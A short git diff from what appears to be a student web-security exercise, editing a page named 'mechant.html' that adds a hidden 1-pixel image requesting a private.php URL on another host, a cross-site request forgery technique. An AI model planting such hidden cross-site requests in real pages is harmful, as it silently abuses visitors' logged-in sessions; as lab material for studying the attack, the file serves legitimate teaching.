tp-form exo 1 fixed

--- a/public/mechant.html
+++ b/public/mechant.html
@@ -6,5 +6,6 @@
 </head>
 <body>
 <button onclick="fetch('http://micke-niepceron.insset.ovh/private.php').then()">Cliquez ici</button>
+<img src="http://micke-niepceron.insset.ovh/private.php" width="1px" height="1px"/>
 </body>
 </html>
